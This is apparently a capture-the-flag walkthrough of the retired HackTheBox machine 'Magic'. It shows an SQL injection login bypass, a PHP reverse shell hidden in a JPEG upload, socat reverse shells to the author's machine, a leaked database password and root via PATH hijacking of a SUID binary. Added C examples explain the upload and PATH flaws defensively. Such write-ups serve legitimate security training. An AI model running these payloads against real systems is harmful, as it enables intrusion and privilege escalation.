
Hackthebox.eu - Retired - Magic



Recon


As always I start with a simple up/down scan using nmap on all TCP ports.


$ nmap -T4 -p- -oX ./nmapb.xml magic.htb


Then I convert the XML output to HTML to make it pretty:


xsltproc ./nmapb.xml -o ./nmapb.html



Not much open, just 22 and 80.


Let's scan just those two ports with -A to run version detection and the default scripts against them:


$ nmap -T4 -A -p22,80 -oX ./nmapf.xml magic.htb


Then convert that to HTML too:


xsltproc ./nmapf.xml -o ./nmapf.html



Looks like OpenSSH 7.6p1 on 22 and Apache 2.4.29 on 80.


Let's see what the web server is serving up.



Looks like a photo gallery web app.


And there is a login page:


http://magic.htb/login.php




Tried admin/admin for the hell of it.






Exploit



What's a little SQLi between friends right?


The second thing I tried was admin'or'1'='1 for the user name.



Well, that was quick.


Tried uploading a PHP file and got this error message:




Dirb found some other folders:



Looks like there is an upload folder under images…


I assume this is where our uploaded pictures would go.



Let's try to upload a picture.



And here is the evil hackerman I uploaded:






And it didn't even rename the file.



So I think the name of the box will help us figure out exactly what the next step is…


MAGIC


As in magic numbers.


https://www.garykessler.net/library/file_sigs.html


So "magic numbers" are basically file signatures: a fixed byte sequence at the start of a file that tells the OS (or any program reading it) what type of file it is. These are usually the first 4 or 5 bytes of the file.


https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf


So my guess is that the upload form is using the magic number to filter out unwanted file types… Let's mess with the magic number of the JPEG we successfully uploaded to see if that is in fact how they are filtering here.
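
As an added example (not the box's own PHP, which this post never shows), here is what a magic-number upload filter actually checks, next to a stricter decision that also ties the sniffed type to a single allowed extension. The signature bytes are the standard JPEG/PNG/GIF ones from the table linked above; the function names and sample inputs are my own.

```c
/* Added example, not the Magic box's upload code: what a magic-number filter
 * checks, and why it has to be combined with other controls. */
#include <stddef.h>
#include <string.h>

typedef struct { const char *mime; const char *ext; const unsigned char *sig; size_t len; } magic_t;

static const unsigned char SIG_JPEG[] = {0xFF, 0xD8, 0xFF};
static const unsigned char SIG_PNG[]  = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};
static const unsigned char SIG_GIF[]  = {'G', 'I', 'F', '8'};
static const magic_t TABLE[] = {
    {"image/jpeg", "jpg",  SIG_JPEG, sizeof SIG_JPEG},
    {"image/jpeg", "jpeg", SIG_JPEG, sizeof SIG_JPEG},
    {"image/png",  "png",  SIG_PNG,  sizeof SIG_PNG},
    {"image/gif",  "gif",  SIG_GIF,  sizeof SIG_GIF},
};
#define NTABLE (sizeof TABLE / sizeof TABLE[0])

/* Naive filter: returns the MIME type whose signature starts the buffer, or
 * NULL. It looks only at the leading bytes, exactly like the box's upload. */
const char *sniff_magic(const unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < NTABLE; i++)
        if (n >= TABLE[i].len && memcmp(buf, TABLE[i].sig, TABLE[i].len) == 0)
            return TABLE[i].mime;
    return NULL;
}

/* Stricter decision: the sniffed type must agree with the one and only
 * (lowercase) extension, so "x.php" and "x.php.jpg" are both rejected.
 * The body after the header is still unverified, so the caller must also
 * store the file under a server-generated name in a directory the web
 * server will never execute scripts from. */
int upload_allowed(const unsigned char *buf, size_t n, const char *filename)
{
    const char *mime = sniff_magic(buf, n);
    const char *dot = strchr(filename, '.');
    if (!mime || !dot || strchr(dot + 1, '.') != NULL)   /* no ext, or double ext */
        return 0;
    for (size_t i = 0; i < NTABLE; i++)
        if (strcmp(TABLE[i].mime, mime) == 0 && strcmp(TABLE[i].ext, dot + 1) == 0)
            return 1;
    return 0;
}
```

The constructed "JPEG header followed by PHP text" case shows the limit of the check: it sniffs as image/jpeg and passes with a .jpg name, which is why the storage rules in the comment matter more than the signature itself.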


Enter Bless


sudo apt-get install bless


I copied the JPEG and renamed it edited.jpg.


Here is the file open in Bless:





As you can see here, the file starts with the hex bytes


FF D8


And back on Mr. Kessler's website we see this is in fact the magic number for JPEG files.






So let's change it to something else and try to upload it again to see if this is in fact how they are filtering files...



Let's change it to the signature of an email file.








After I tried to upload it I got this error message:


hmmmm



Well, that didn't work. Let's see if we can edit it in transit.



Let's fire up Burp and capture the successful JPG upload again.


Let's try inserting our PHP script directly into the POST.


I'm just going to insert some PHP directly into the request, a bit after the beginning of the file, to see if we can get a shell.


I'm going to use a simple reverse shell back to a listener I have set up on my Kali box:



<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/5555 0>&1'");
?>


Here you can see where I stuck the PHP in and renamed the file being uploaded:



I'll just need my listener…


nc -lnvp 5555



It uploaded. Now we can just browse to the image/php and hopefully we get our shell.



Cool, we got our foothold.



Poking around the file system I found a file named db.php5.



There is a username and password in it.


File that away for now and keep looking around.



Didn't find much else in the file system. Tried to su to theseus and SSH as theseus, and neither worked. Let's see if we can get some info from the db.



Here is the output of su:


So we need to upgrade to a tty… I searched around a lot and tried a bunch of different methods, and finally came across this blog post that talks about using socat…


https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/


So I used wget and SimpleHTTPServer to send socat over to the Magic box:

wget http://10.10.14.19:8888/socat

Gave it execute rights:

chmod +x socat


Then set up socat on my Kali box:

socat file:`tty`,raw,echo=0 tcp-listen:4445



Finally, start the connection from my shell:

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.19:4445




I guess that's not the right password...


Let's see if that DB we found mention of might have some different creds in it.




Hmmm it says mysql is not installed… but there was the db info we found which 


I tried locate




I saw this interesting executable





And I can run it




https://dev.mysql.com/doc/refman/8.0/en/mysqldump.html


Had to play around with the syntax in order to use the user/pass we found earlier, but finally got it done:


mysqldump -u theseus -p --databases Magic > /tmp/circusmonkey/dump.sq


After reading the new dump we see another set of creds:


admin/Th3s3usW4sK1ng


This is the legit login for the upload function on the website.


Let's see if we can su to theseus using this password...



Woot, we are theseus.


Let's get that hash:



theseus@ubuntu:~$ cat ./user.txt 

d36***********************************



So what about escalation?


I copied LinEnum.sh and linpeas over to the Magic box and ran both of them.


This output from linpeas caught my eye:


[+] Readable files belonging to root and readable by me but not world readable
-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo



There is an executable called sysinfo that is owned by root and that I can execute. It's a SUID file, which means that when I run it, it runs with root's privileges…





Let's see if we can figure out what it does.


Looks like it pulls back some info about the hardware of the machine. I can see why this program might need root privileges.


I wonder what it is doing in the background to get these stats?


Running strings against it I saw this:


strings /bin/sysinfo


Looks like it might just be running some other programs to get these results.



I know what cat does; what does free do?



It gives us RAM stats…


From the strings output it looks like the program just calls free. Let's start pspy to see if we can get any more info about this.


I used wget to transfer pspy64 over to the box and ran it alongside sysinfo:




Cool, it's just calling that executable and dumping the results out… But the most important thing here is that it calls it without an explicit path. It relies on free being found in one of the directories of our PATH environment variable.


So here is the cool thing about the PATH environment variable… It doesn't care which executables live in the directories you give it. It just looks for an executable with a matching name in each directory, in the order they are listed, and the first one it finds is the one it uses. So, following that logic, if there are two executables with the same name on the system, it will walk down the list of directories in PATH and stop at the first match.


So I can make a new executable named free in any directory I control, update PATH so that my directory comes first, and sysinfo will execute my free instead of the one it is trying to call.
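
To show exactly what "first match wins" means, here is an added C example (not the box's sysinfo source) that resolves a bare command name against a PATH string the way the shell does, beside the fixed-PATH lookup a setuid program should use instead. make_exe and the directory names are scaffolding I made up for testing, and a POSIX host is assumed.

```c
/* Added example, not the box's sysinfo source: how a bare command name is
 * resolved against PATH (first match wins, left to right), and a hardened lookup. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Returns 1 and writes the winning path to out, 0 if no directory holds cmd.
 * An empty element (leading ":", "::") means the current directory, so the
 * box's "PATH=:/usr/local/sbin:..." already searches "." before anything else. */
int resolve_in_path(const char *cmd, const char *path, char *out, size_t outlen)
{
    char copy[4096];
    if (strchr(cmd, '/')) {                 /* has a slash: PATH is not consulted */
        snprintf(out, outlen, "%s", cmd);
        return access(out, X_OK) == 0;
    }
    snprintf(copy, sizeof copy, "%s", path);
    for (char *p = copy;;) {                /* manual split keeps empty elements */
        char *sep = strchr(p, ':');
        if (sep) *sep = '\0';
        snprintf(out, outlen, "%s/%s", *p ? p : ".", cmd);
        if (access(out, X_OK) == 0) return 1;
        if (!sep) break;
        p = sep + 1;
    }
    out[0] = '\0';
    return 0;
}

/* What sysinfo should do: never consult the caller's PATH; use a fixed one
 * (or simply call /usr/bin/free by absolute path). */
#define SAFE_PATH "/usr/sbin:/usr/bin:/sbin:/bin"
int resolve_safely(const char *cmd, char *out, size_t outlen)
{
    return resolve_in_path(cmd, SAFE_PATH, out, outlen);
}

/* Test helper: drops a constructed, harmless script named name into dir so the
 * lookup can be exercised without touching the real free(1). */
int make_exe(const char *dir, const char *name)
{
    char p[512];
    snprintf(p, sizeof p, "%s/%s", dir, name);
    FILE *f = fopen(p, "w");
    if (!f) return 0;
    fputs("#!/bin/sh\nexit 0\n", f);
    fclose(f); return chmod(p, 0755) == 0;
}
```

Two directories that each hold a "free" resolve differently depending only on their order in PATH, while resolve_safely never sees either of them; that order dependence is the whole privilege-escalation bug.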


The old switcheroo




So let's start with making our executable…


So the goal here is to get the root flag… We can just write it out to a directory we control, like /tmp/circusmonkey2 that I created earlier.


So let's create our version of free:


echo " cat /root/root.txt > /tmp/circusmonkey2/root.txt" > free  




Right now the PATH environment variable looks like this:


PATH=:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games


We simply want to put /tmp/circusmonkey2 at the beginning of it.


We use the export command to change these variables, so I will do:


export PATH=/tmp/circusmonkey2:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games



Now when we call any program without an explicit path it will look in our directory first, then move down the PATH until it finds it.


Now if we run /bin/sysinfo it should cat out the contents of /root/root.txt and put it in a new file in /tmp/circusmonkey2 called root.txt.


Actually, you know what? We forgot a step here. We forgot to give our version of free execute rights:


chmod +x ./free


So let's run sysinfo now:


/bin/sysinfo


The program now stops at the memory usage phase and doesn't show any RAM stats, because it is using our free now instead of the real one.



As you can see, it did create root.txt for us.


Alternatively, to get a proper shell we can reuse socat to make another outgoing connection to our Kali box as root:



echo "
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.24:4455
" > free


Then start another listener on our Kali box:


socat file:`tty`,raw,echo=0 tcp-listen:4455



Now when we run /bin/sysinfo we get this:



We are completely in as root.


In the root directory we can see the C code that made the sysinfo executable.

